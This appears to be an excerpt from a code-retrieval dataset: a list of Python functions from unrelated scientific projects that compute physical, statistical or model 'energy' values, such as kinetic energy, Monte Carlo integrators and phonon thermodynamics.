self.lkf_lin.val -\n self.lkf_quad.val * (T_m - self.Tamb.val_SI) ** 2))", "def uncertainty_ee(self,e1,e2):\n # reco\n unc = (self._eleRecoWeight[(e1.pt(),e1.eta())][1]/self._eleRecoWeight[(e1.pt(),e1.eta())][0] + \\\n self._eleRecoWeight[(e2.pt(),e2.eta())][1]/self._eleRecoWeight[(e2.pt(),e2.eta())][0])**2\n # id-isolation\n unc += (self._eleIdIsoWeight[(e1.pt(),e1.eta())][1]/self._eleIdIsoWeight[(e1.pt(),e1.eta())][0] + \\\n self._eleIdIsoWeight[(e2.pt(),e2.eta())][1]/self._eleIdIsoWeight[(e2.pt(),e2.eta())][0])**2\n # trigger (approximate)\n unc += (abs(self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][1]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][1]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][1]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][1])/ \\\n (self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]))**2\n unc += ((self._ele8TrgWeight[(e1.pt(),e1.eta())][1]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][1])/ \\\n (self._ele8TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]+ \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele8TrgWeight[(e2.pt(),e2.eta())][0]- \\\n self._ele17TrgWeight[(e1.pt(),e1.eta())][0]*self._ele17TrgWeight[(e2.pt(),e2.eta())][0]))**2\n #outcome\n return sqrt(unc)", "def compute_energy(self):\n energy = 0.5 * self.masses * np.sum(self.velocities * self.velocities, axis=1)\n avg_energy = np.mean(energy) # average kinetic energy of all particles\n return avg_energy", "def self_energy(gf_imp0, gf_imp):\n return 1/gf_imp0 - 1/gf_imp", "def kinetic_energy(vel):\r\n return 0.5 * (vel ** 2).sum(axis=1)", "def kin_energy (self):\n\n for planet in self.planets:\n planet.kenergy = 0.5*planet.mass*((np.linalg.norm(planet.velocity))**2) # every 'kenergy' depends by the body's mass and velocity", "def energy_func(self):\n i = self.inl[0].to_flow()\n o = self.outl[0].to_flow()\n\n T_m = (T_mix_ph(i, T0=self.inl[0].T.val_SI) +\n T_mix_ph(o, T0=self.outl[0].T.val_SI)) / 2\n\n iam = (\n 1 - self.iam_1.val * abs(self.aoi.val) -\n self.iam_2.val * self.aoi.val ** 2)\n\n return (i[0] * (o[2] - i[2]) -\n self.A.val * (\n self.E.val * self.eta_opt.val * self.doc.val ** 1.5 * iam -\n (T_m - self.Tamb.val_SI) * self.c_1.val -\n self.c_2.val * (T_m - self.Tamb.val_SI) ** 2))", "def _energy(self, X, y):\n yhat = self.evaluate(X)\n loss = ((y - yhat) ** 2).sum() / 2\n return loss", "def energy(e: float) -> float:\n\n return (1/np.sqrt(2))*(gamma(-e/2+1/2)/(gamma(-e/2+3/4)))", "def get_energy(self):\r\n return self._energy", "def useKineticEnergy(self):\n return self.params['useKinetic']", "def __init__(self, temperature=298.0 * simtk.unit.kelvin, nsteps=10, timestep=1 * simtk.unit.femtoseconds):\n\n super(HMCIntegrator, self).__init__(timestep)\n\n # Compute the thermal energy.\n kT = kB * temperature\n\n #\n # Integrator initialization.\n #\n self.addGlobalVariable(\"naccept\", 0) # number accepted\n self.addGlobalVariable(\"ntrials\", 0) # number of Metropolization trials\n\n self.addGlobalVariable(\"kT\", kT) # thermal energy\n self.addPerDofVariable(\"sigma\", 0)\n self.addGlobalVariable(\"ke\", 0) # kinetic energy\n self.addPerDofVariable(\"xold\", 0) # old positions\n self.addGlobalVariable(\"Eold\", 0) # old energy\n self.addGlobalVariable(\"Enew\", 0) # new energy\n self.addGlobalVariable(\"accept\", 0) # accept or reject\n self.addPerDofVariable(\"x1\", 0) # for constraints\n\n #\n # Pre-computation.\n # This only needs to be done once, but it needs to be done for each degree of freedom.\n # Could move this to initialization?\n #\n self.addComputePerDof(\"sigma\", \"sqrt(kT/m)\")\n\n #\n # Allow Context updating here, outside of inner loop only.\n #\n self.addUpdateContextState()\n\n #\n # Draw new velocity.\n #\n self.addComputePerDof(\"v\", \"sigma*gaussian\")\n self.addConstrainVelocities()\n\n #\n # Store old position and energy.\n #\n self.addComputeSum(\"ke\", \"0.5*m*v*v\")\n self.addComputeGlobal(\"Eold\", \"ke + energy\")\n self.addComputePerDof(\"xold\", \"x\")\n\n #\n # Inner symplectic steps using velocity Verlet.\n #\n for step in range(nsteps):\n self.addComputePerDof(\"v\", \"v+0.5*dt*f/m\")\n self.addComputePerDof(\"x\", \"x+dt*v\")\n self.addComputePerDof(\"x1\", \"x\")\n self.addConstrainPositions()\n self.addComputePerDof(\"v\", \"v+0.5*dt*f/m+(x-x1)/dt\")\n self.addConstrainVelocities()\n\n #\n # Accept/reject step.\n #\n self.addComputeSum(\"ke\", \"0.5*m*v*v\")\n self.addComputeGlobal(\"Enew\", \"ke + energy\")\n self.addComputeGlobal(\"accept\", \"step(exp(-(Enew-Eold)/kT) - uniform)\")\n self.addComputePerDof(\"x\", \"x*accept + xold*(1-accept)\")\n\n #\n # Accumulate statistics.\n #\n self.addComputeGlobal(\"naccept\", \"naccept + accept\")\n self.addComputeGlobal(\"ntrials\", \"ntrials + 1\")", "def _calculate_measurement_error(self): \n \n # Calculate Hartmann Spot\n # FIXME what are factor_1, factor_2 ???\n factor_1, factor_2 = 206265*5.89e-7, 206265*6.5e-7\n term1, term2 = factor_1/self.actuator_spacing, factor_2/self.r0\n hartmann_spot = np.max([term1, term2])\n \n # Calculate SNR \n n_pix=4 # FIXME spreadsheet says not to change this idk why?\n sample_time = 1/(10*self.controller_frequency)\n brightness = (8.9e5)*10**((0-self.guide_star_mag)/2.5)\n n_photons = brightness*sample_time*((100*self.actuator_spacing)**2)\n snr = n_photons/np.sqrt(n_photons + n_pix*(self.sigma_readnoise)**2)\n\n # Calculate noise propagator \n degrees_of_freedom = np.round((np.pi/4) * (self.telescope_diameter/self.actuator_spacing)**2)\n factor_1, factor_2 = 0.0536, 0.0795 # FIXME WHAT THE HECK IS THIS\n if self.aperture == 'circular':\n factor_1, factor_2 = 0.0068, 0.0796\n noise_propagator = np.sqrt(2*(factor_1 + factor_2*np.log(degrees_of_freedom)))\n\n # Calculate close loop averaging\n controller_over_frame = 1/10\n close_loop_averaging = np.sqrt(2*controller_over_frame)*np.arctan(1/(2*controller_over_frame))\n sigma_measurement = noise_propagator * close_loop_averaging * (self.actuator_spacing*1e9) * (hartmann_spot/snr*4.84814e-6)\n self.sigma_measurement = sigma_measurement # in nm", "def get_energy(self):\n return self.momentum*self.momentum/(2*self.mass)", "def calc_gravitational_energy(self):\n\n star = self.star\n\n M, K, N = star.mesh_size\n ph = star.phi_coords\n mu = star.mu_coords\n r = star.r_coords\n\n def S1(j, k):\n sum = 0\n\n for i in range(0, M - 2, 2):\n sum += (1 / 6) * (ph[i + 2] - ph[i]) * (star.rho[i, j, k] * star.Phi[i, j, k] + 4 *\n star.rho[i + 1, j, k] * star.Phi[i + 1, j, k] +\n star.rho[i + 2, j, k] * star.Phi[i + 2, j, k])\n return 2 * sum\n\n def S2(k):\n sum = 0\n\n for j in range(0, K - 2, 2):\n sum += (1 / 6) * (mu[j + 2] - mu[j]) * \\\n (S1(j, k) + 4 * S1(j + 1, k) + S1(j + 2, k))\n\n return 2 * sum\n\n W = 0\n\n for k in range(0, N - 2, 2):\n W -= 0.5 * (1 / 6) * (r[k + 2] - r[k]) * (r[k]**2 * S2(k) +\n 4 * r[k + 1]**2 * S2(k + 1) +\n r[k + 2]**2 * S2(k + 2))\n\n return W", "def malthusiens(nb_init, t0, tf, eps, methode, gamma ) :\n\n f=lambda y, t : gamma*y\n Y=meth_epsilon(nb_init, t0, tf, eps, f, methode)\n return Y", "def calculate_energy(self):\n temp_e = 0\n\n for i in range(0,self.neuron_count):\n for j in range(0, self.neuron_count):\n if i != j:\n temp_e += self.get_weight(i, j) * self.current_state[i] * \\\n self.current_state[j]\n return -1 * temp_e / 2", "def helmholtzenergy(temp,pres):\n g = liq_g(0,0,temp,pres)\n g_p = liq_g(0,1,temp,pres)\n f = g - pres*g_p\n return f", "def kinetic_energy_rigidbody(theta, phi, vX, vY, vtheta, vphi, vpsi, Mm, params):\n l = params['l']\n I3 = params['I3']\n I1star = params['I1'] + Mm * l ** 2\n\n # gw3 = vpsi + vphi* np.cos(theta)\n w3 = params['w3']\n\n v_sq = vX ** 2 + vY ** 2\n vXprod = vX * (vtheta * np.cos(theta) * np.cos(phi) - vphi * np.sin(theta) * np.sin(phi))\n vYprod = vY * (vtheta * np.cos(theta) * np.sin(phi) + vphi * np.sin(theta) * np.cos(phi))\n T1 = 0.5 * Mm * (v_sq)\n T2 = Mm * l * (vXprod + vYprod)\n T3 = 0.5 * I1star * (vphi ** 2 * np.sin(theta) ** 2 + vtheta ** 2)\n T4 = 0.5 * I3 * w3 ** 2\n\n KEvec = T1 + T2 + T3 + T4\n KE = sum(KEvec)\n if 'BIND' in params:\n if len(params['BIND']) > 0:\n KEnonboundary = KE - sum(KEvec[params['BIND']])\n else:\n KEnonboundary = 0 * KE\n else:\n KEnonboundary = 0 * KE\n\n return KE, KEvec, KEnonboundary, sum(T1), sum(T2), sum(T3), sum(T4)", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def energy(ps):\n return kinetic_energy(ps) + potential_energy(ps)", "def method_2(kdep=0.002, krand=8e-6, Mn0=70000):\n a = np.exp((kdep * t * (1 / Mn0 + krand * c_water / 1e-5)) / (-2.3))\n return a", "def total_kin_energy (self):\n total = 0. \n for planet in self.planets: #this loop takes each planet's kinetic energy and sums it with the others.\n total += planet.kenergy # the sum of the kinetic energies\n total_kin= total # system's kinetic energy\n \n return(total_kin)", "def kinetic_energy(ps):\n return sum([p.kinetic_energy() for p in ps])", "def get_evaporation_latent_heat() -> float:\n theta = 28.0\n return 2500.8 - 2.3668 * theta", "def kge(sim, obs, dim=\"time\"):\n cc = pearson_correlation(sim, obs, dim=dim)\n cc.name = \"kge_pearson_coef\"\n alpha = sim.std(dim=dim) / obs.std(dim=dim)\n alpha.name = \"kge_rel_var\"\n beta = sim.sum(dim=dim) / obs.sum(dim=dim)\n beta.name = \"kge_bias\"\n kge = 1 - np.sqrt((cc - 1) ** 2 + (alpha - 1) ** 2 + (beta - 1) ** 2)\n kge.name = \"kge\"\n ds_out = xr.merge([kge, cc, alpha, beta])\n return ds_out", "def energies():\n # Hardcoded initial values\n numsteps = 10000\n time_max = 1\n # Running the calculation in the solver class using the velocity verlet method\n # for better accuracy.\n verlet = solver(input_matrix, 'verlet', time_max, numsteps)\n output_matrix, KE, PE, AM = verlet.main()\n # Creating a simple time axis for plotting\n x = np.linspace(0, 1, numsteps+1)\n\n # Plotting kinetic energy over time\n plt.figure(1, figsize=(10, 10))\n plt.plot(x, KE)\n plt.suptitle('Total kinetic energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE'])\n\n # Plotting potential energy over time\n plt.figure(2, figsize=(10, 10))\n plt.plot(x, PE)\n plt.suptitle('Total potential energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['PE'])\n\n # Plotting total energy against time\n plt.figure(3, figsize=(10, 10))\n plt.plot(x, PE+KE)\n plt.suptitle('Total energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['KE+PE'])\n\n # Plotting angular momentum against time. print the amplitude to terminal\n amplitude = max(AM)-min(AM)\n print('Amplitude of angular momentum during 1 year: %g[AU²/yr²]' %(amplitude))\n plt.figure(4, figsize=(10, 10))\n plt.plot(x, AM)\n plt.suptitle('Total angular momentum in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²/yr²]', fontsize=16)\n plt.legend(['AM'])\n\n # Plotting the kinetic, potential and total energy against time to see\n # how great the variations are\n plt.figure(5, figsize=(10, 10))\n plt.plot(x, PE, x, KE, x, KE+PE)\n plt.suptitle('Total energy in the Earth-Sun system.', fontsize=24)\n plt.xlabel('time [yr]', fontsize=16)\n plt.ylabel('energy [AU²*kg/yr²]', fontsize=16)\n plt.legend(['PE', 'KE', 'KE+PE'])\n plt.show()", "def define_potts_helper_functions(k):\n\n @njit\n def calc_observables(X, k=k):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n\n Returns\n -------\n ndarray\n Dimensions (n_samples, n_observables).\n \"\"\"\n\n n = X.shape[1]\n Y = np.zeros((len(X), n*k+n*(n-1)//2), dtype=np.int8)\n \n # average orientation (magnetization)\n # note that fields for the third state are often set to 0\n counter = 0\n for i in range(k):\n for j in range(n):\n Y[:,counter] = X[:,j]==i\n counter += 1\n \n # pairwise correlations\n for i in range(n-1):\n for j in range(i+1, n):\n Y[:,counter] = X[:,i]==X[:,j]\n counter += 1\n \n return Y\n\n def calc_e(X, multipliers, k=k, calc_observables=calc_observables):\n \"\"\"\n Parameters\n ----------\n X : ndarray of dtype np.int64\n Dimensions (n_samples, n_spins).\n multipliers : ndarray of dtype np.float64\n\n Returns\n -------\n ndarray\n Energies of each observable.\n \"\"\"\n\n return -calc_observables(X, k).dot(multipliers)\n\n def mch_approximation(sample, dlamda, calc_e=calc_e):\n \"\"\"Function for making MCH approximation step for Potts model.\n \n Parameters\n ----------\n sample : ndarray\n Of dimensions (n_sample, n_spins).\n dlamda : ndarray\n Change in parameters.\n \n Returns\n -------\n ndarray\n Predicted correlations.\n \"\"\"\n\n dE = calc_e(sample, dlamda)\n ZFraction = len(dE) / np.exp(logsumexp(-dE))\n predsisj = (np.exp(-dE[:,None]) / len(dE) * calc_observables(sample)).sum(0) * ZFraction \n assert not ((predsisj<0).any() or\n (predsisj>(1+1e-10)).any()),\"Predicted values are beyond limits, (%E,%E)\"%(predsisj.min(),\n predsisj.max())\n return predsisj\n\n return calc_e, calc_observables, mch_approximation", "def calculate(self, model_name, number_of_points, bandwidth,dis_param, c,k, seed, phi=0):\n if model_name != \"Anderson\":\n raise Error(\"NotImpelmented\")\n prng = np.random.RandomState((None if seed == 0 else seed))\n \n m = models.Model_Anderson_DD_1d(number_of_points=number_of_points,\n bandwidth=bandwidth, dis_param=dis_param, periodic=False, prng = prng)\n prng = np.random.RandomState((None if seed == 0 else seed))\n \n m1 = models.Model_Anderson_DD_1d(number_of_points=number_of_points,\n bandwidth=bandwidth, dis_param=dis_param, periodic=True, prng = prng, phi=0)\n prng = np.random.RandomState((None if seed == 0 else seed))\n \n m2 = models.Model_Anderson_DD_1d(number_of_points=number_of_points,\n bandwidth=bandwidth, dis_param=dis_param, periodic=True, prng = prng, phi=phi)\n \n g = abs(phys_functions.A_matrix_inv(m.rate_matrix, c, k))**2\n psi_1, psi_N = (m1.eig_matrix[0,:]), (m1.eig_matrix[-1,:])\n thouless, prec = phys_functions.pure_thouless_g(m1.eig_vals, m2.eig_vals, phi)\n heat_g = phys_functions.heat_g(psi_1, psi_N)\n psi1psiN = np.nansum(abs(psi_1*psi_N))\n ############# UGLY HACK : Append zeros to fit sizes\n vals_with_N_size = [('psi_1', psi_1),\n ('psi_N', psi_N),('thouless_g', abs(thouless))]\n if self._N == number_of_points :\n appended = vals_with_N_size\n else:\n myzeros = np.zeros(self._N - number_of_points)\n \n appended = [(key, np.append(val,myzeros)) for key,val in vals_with_N_size]\n \n print (prec*number_of_points, np.nansum(thouless))\n return dict([('g', g), ('psi1psiN',psi1psiN), \n ('thouless_sum', abs(np.nansum(abs(thouless)))), ('phi',phi),('heat_g', heat_g)] +appended)", "def getEnergy(self):\n energy = 0.0\n\n for i in range(0, self.nPoints):\n energy += self.tDomain[i] ** 2\n\n energy /= self.nPoints\n return energy", "def computeEnergy(self):\n\t\tGmo = self.Gmo\n\t\te = self.e\n\t\tself.Ec = 0.0\n\n\t\tfor i in range( self.nocc ):\n\t\t\tfor j in range( self.nocc ):\n\t\t\t\tfor a in range( self.nocc,self.norb ):\n\t\t\t\t\tfor b in range( self.nocc,self.norb ):\n\t\t\t\t\t\tself.Ec += 0.25*(Gmo[i,j,a,b]*Gmo[a,b,i,j])/(e[i]+e[j]-e[a]-e[b])\n\n\t\treturn self.E0 + self.Ec", "def fit_DTC(self, Kmm, Kmn, epsilon=1e-3,power_ep=[1.,1.]):\r\n self.epsilon = epsilon\r\n self.eta, self.delta = power_ep\r\n\r\n num_inducing = Kmm.shape[0]\r\n\r\n #TODO: this doesn't work with uncertain inputs!\r\n\r\n \"\"\"\r\n Prior approximation parameters:\r\n q(f|X) = int_{df}{N(f|KfuKuu_invu,diag(Kff-Qff)*N(u|0,Kuu)} = N(f|0,Sigma0)\r\n Sigma0 = Qnn = Knm*Kmmi*Kmn\r\n \"\"\"\r\n KmnKnm = np.dot(Kmn,Kmn.T)\r\n Lm = jitchol(Kmm)\r\n Lmi = chol_inv(Lm)\r\n Kmmi = np.dot(Lmi.T,Lmi)\r\n KmmiKmn = np.dot(Kmmi,Kmn)\r\n Qnn_diag = np.sum(Kmn*KmmiKmn,-2)\r\n LLT0 = Kmm.copy()\r\n\r\n #Kmmi, Lm, Lmi, Kmm_logdet = pdinv(Kmm)\r\n #KmnKnm = np.dot(Kmn, Kmn.T)\r\n #KmmiKmn = np.dot(Kmmi,Kmn)\r\n #Qnn_diag = np.sum(Kmn*KmmiKmn,-2)\r\n #LLT0 = Kmm.copy()\r\n\r\n \"\"\"\r\n Posterior approximation: q(f|y) = N(f| mu, Sigma)\r\n Sigma = Diag + P*R.T*R*P.T + K\r\n mu = w + P*Gamma\r\n \"\"\"\r\n mu = np.zeros(self.num_data)\r\n LLT = Kmm.copy()\r\n Sigma_diag = Qnn_diag.copy()\r\n\r\n \"\"\"\r\n Initial values - Cavity distribution parameters:\r\n q_(g|mu_,sigma2_) = Product{q_i(g|mu_i,sigma2_i)}\r\n sigma_ = 1./tau_\r\n mu_ = v_/tau_\r\n \"\"\"\r\n self.tau_ = np.empty(self.num_data,dtype=float)\r\n self.v_ = np.empty(self.num_data,dtype=float)\r\n\r\n #Initial values - Marginal moments\r\n z = np.empty(self.num_data,dtype=float)\r\n self.Z_hat = np.empty(self.num_data,dtype=float)\r\n phi = np.empty(self.num_data,dtype=float)\r\n mu_hat = np.empty(self.num_data,dtype=float)\r\n sigma2_hat = np.empty(self.num_data,dtype=float)\r\n\r\n #Approximation\r\n epsilon_np1 = 1\r\n epsilon_np2 = 1\r\n \tself.iterations = 0\r\n np1 = [self.tau_tilde.copy()]\r\n np2 = [self.v_tilde.copy()]\r\n while epsilon_np1 > self.epsilon or epsilon_np2 > self.epsilon:\r\n update_order = np.random.permutation(self.num_data)\r\n for i in update_order:\r\n #Cavity distribution parameters\r\n self.tau_[i] = 1./Sigma_diag[i] - self.eta*self.tau_tilde[i]\r\n self.v_[i] = mu[i]/Sigma_diag[i] - self.eta*self.v_tilde[i]\r\n #Marginal moments\r\n self.Z_hat[i], mu_hat[i], sigma2_hat[i] = self.noise_model.moments_match(self.data[i],self.tau_[i],self.v_[i])\r\n #Site parameters update\r\n Delta_tau = self.delta/self.eta*(1./sigma2_hat[i] - 1./Sigma_diag[i])\r\n Delta_v = self.delta/self.eta*(mu_hat[i]/sigma2_hat[i] - mu[i]/Sigma_diag[i])\r\n self.tau_tilde[i] += Delta_tau\r\n self.v_tilde[i] += Delta_v\r\n #Posterior distribution parameters update\r\n DSYR(LLT,Kmn[:,i].copy(),Delta_tau) #LLT = LLT + np.outer(Kmn[:,i],Kmn[:,i])*Delta_tau\r\n L = jitchol(LLT)\r\n #cholUpdate(L,Kmn[:,i]*np.sqrt(Delta_tau))\r\n V,info = dtrtrs(L,Kmn,lower=1)\r\n Sigma_diag = np.sum(V*V,-2)\r\n si = np.sum(V.T*V[:,i],-1)\r\n mu += (Delta_v-Delta_tau*mu[i])*si\r\n self.iterations += 1\r\n #Sigma recomputation with Cholesky decompositon\r\n LLT = LLT0 + np.dot(Kmn*self.tau_tilde[None,:],Kmn.T)\r\n L = jitchol(LLT)\r\n V,info = dtrtrs(L,Kmn,lower=1)\r\n V2,info = dtrtrs(L.T,V,lower=0)\r\n Sigma_diag = np.sum(V*V,-2)\r\n Knmv_tilde = np.dot(Kmn,self.v_tilde)\r\n mu = np.dot(V2.T,Knmv_tilde)\r\n epsilon_np1 = sum((self.tau_tilde-np1[-1])**2)/self.num_data\r\n epsilon_np2 = sum((self.v_tilde-np2[-1])**2)/self.num_data\r\n np1.append(self.tau_tilde.copy())\r\n np2.append(self.v_tilde.copy())\r\n\r\n self._compute_GP_variables()", "def calculate_E0(self) -> float:\n noisy = self.kernel_eigenvectors_[-1].copy()\n np.random.shuffle(noisy)\n\n kernel_eigenvectors = self.kernel_eigenvectors_[:-1]\n kernel_eigenvectors.append(noisy)\n\n eigenvectors_matrix = scipy.sparse.csr_matrix(\n np.column_stack([eigenvector for eigenvector in kernel_eigenvectors])\n )\n\n if len(kernel_eigenvectors) == 2:\n ev0 = kernel_eigenvectors[0]\n ev1 = kernel_eigenvectors[1]\n _, Gamma, _ = scipy.sparse.linalg.svds(\n ev0.T @ ev1, k=self.n_jointly_smooth_functions, which=\"LM\"\n )\n else:\n _, Gamma, _ = scipy.sparse.linalg.svds(\n eigenvectors_matrix, k=self.n_jointly_smooth_functions, which=\"LM\"\n )\n\n Gamma.sort()\n gamma2 = Gamma[-2]\n E0 = (1 + gamma2) / 2\n return E0", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def make_energy(self):\n def energy_func(m):\n heff = self.field(m)\n return -energy.zeeman(m, self.Ms, heff) \\\n + energy.shape_anisotropy(m, self.Ms,\n self.Nd[0], self.Nd[1], self.Nd[2])\n self.energy = energy_func", "def additional_equations(self, k):\n ######################################################################\n # equation for saturated gas at hot side outlet\n o1 = self.outl[0].to_flow()\n self.residual[k] = o1[2] - h_mix_pQ(o1, 1)", "def get_effective_mass():\n\n H_BAR = 6.582119514e-16 # eV*s\n M_0 = 9.10938356e-31 # kg\n N_KPTS = 6 # Number of k-points included in the parabola.\n\n spin_up = Spin(1)\n\n band_structure = Vasprun('vasprun.xml').get_band_structure()\n\n # Locations of CBM and VBM in band_structure.bands\n cbm_band_index = band_structure.get_cbm()['band_index'][spin_up][0]\n cbm_kpoint_index = band_structure.get_cbm()['kpoint_index'][0]\n\n vbm_band_index = band_structure.get_vbm()['band_index'][spin_up][0]\n vbm_kpoint_index = band_structure.get_vbm()['kpoint_index'][0]\n\n k = {'electron': {'left': [], 'right': []},\n 'hole': {'left': [], 'right': []}}\n E = {'electron': {'left': [], 'right': []},\n 'hole': {'left': [], 'right': []}}\n\n e_ref_coords = band_structure.kpoints[cbm_kpoint_index]._ccoords\n h_ref_coords = band_structure.kpoints[vbm_kpoint_index]._ccoords\n\n for n in range(-N_KPTS, 1):\n e_coords = band_structure.kpoints[cbm_kpoint_index + n]._ccoords\n h_coords = band_structure.kpoints[vbm_kpoint_index + n]._ccoords\n\n k['electron']['left'].append(\n ((e_coords[0] - e_ref_coords[0])**2 +\n (e_coords[1] - e_ref_coords[1])**2 +\n (e_coords[2] - e_ref_coords[2])**2)**0.5\n )\n k['hole']['left'].append(\n ((h_coords[0] - h_ref_coords[0])**2 +\n (h_coords[1] - h_ref_coords[1])**2 +\n (h_coords[2] - h_ref_coords[2])**2)**0.5\n )\n\n e_energy = band_structure.bands[\n spin_up][cbm_band_index][cbm_kpoint_index + n]\n h_energy = band_structure.bands[\n spin_up][vbm_band_index][vbm_kpoint_index + n]\n\n E['electron']['left'].append(e_energy)\n E['hole']['left'].append(h_energy)\n\n for n in range(1, 1 + N_KPTS):\n e_coords = band_structure.kpoints[cbm_kpoint_index + n]._ccoords\n h_coords = band_structure.kpoints[vbm_kpoint_index + n]._ccoords\n\n k['electron']['right'].append(\n ((e_coords[0] - e_ref_coords[0])**2 +\n (e_coords[1] - e_ref_coords[1])**2 +\n (e_coords[2] - e_ref_coords[2])**2)**0.5\n )\n k['hole']['right'].append(\n ((h_coords[0] - h_ref_coords[0])**2 +\n (h_coords[1] - h_ref_coords[1])**2 +\n (h_coords[2] - h_ref_coords[2])**2)**0.5\n )\n\n e_energy = band_structure.bands[\n spin_up][cbm_band_index][cbm_kpoint_index + n]\n h_energy = band_structure.bands[\n spin_up][vbm_band_index][vbm_kpoint_index + n]\n\n E['electron']['right'].append(e_energy)\n E['hole']['right'].append(h_energy)\n\n # 2nd order fits\n e_l_fit = np.poly1d(\n np.polyfit(k['electron']['left'], E['electron']['left'], 2))\n e_r_fit = np.poly1d(\n np.polyfit(k['electron']['right'], E['electron']['right'], 2))\n h_l_fit = np.poly1d(\n np.polyfit(k['hole']['left'], E['hole']['left'], 2))\n h_r_fit = np.poly1d(\n np.polyfit(k['hole']['right'], E['hole']['right'], 2))\n\n # Curvatures\n e_l_curvature = e_l_fit.deriv().deriv()[0]\n e_r_curvature = e_r_fit.deriv().deriv()[0]\n h_l_curvature = h_l_fit.deriv().deriv()[0]\n h_r_curvature = h_r_fit.deriv().deriv()[0]\n\n # Unit conversion\n e_m_eff_l = 10 * ((H_BAR ** 2) / e_l_curvature) / M_0\n e_m_eff_r = 10 * ((H_BAR ** 2) / e_r_curvature) / M_0\n h_m_eff_l = -10 * ((H_BAR ** 2) / h_l_curvature) / M_0\n h_m_eff_r = -10 * ((H_BAR ** 2) / h_r_curvature) / M_0\n\n return {'electron': {'left': e_m_eff_l, 'right': e_m_eff_r},\n 'hole': {'left': h_m_eff_l, 'right': h_m_eff_r}}", "def az_kinetic_model(nt, tf, ka_rates, kb_rates, normed=True, X0=None):\n def dx(x, t, A, B):\n return np.dot(A, x) + B\n \n if type(nt) == list:\n nt = transform(nt)\n \n A = network_matrix(nt, ka_rates)\n B = np.dot(network_matrix(nt, kb_rates), np.ones(A.shape[0]))\n if X0 == None:\n X0 = np.zeros(A.shape[0])\n \n X = odeint(lambda x, t: dx(x, t, A, B), X0, np.linspace(0, tf, 1000))\n if normed:\n return az.norm_array(X[-1])\n else:\n return X[-1]", "def energy(self, state):\n return _modeller.mod_state_optimizer_energy(self._modpt,\n self.__edat.modpt,\n state, self.__libs.modpt)", "def __init__(self, temperature=298.0 * simtk.unit.kelvin, collision_rate=91.0 / simtk.unit.picoseconds, timestep=1.0 * simtk.unit.femtoseconds):\n\n # Initialize constants.\n kT = kB * temperature\n gamma = collision_rate\n\n # Create a new custom integrator.\n super(GHMCIntegrator, self).__init__(timestep)\n\n #\n # Integrator 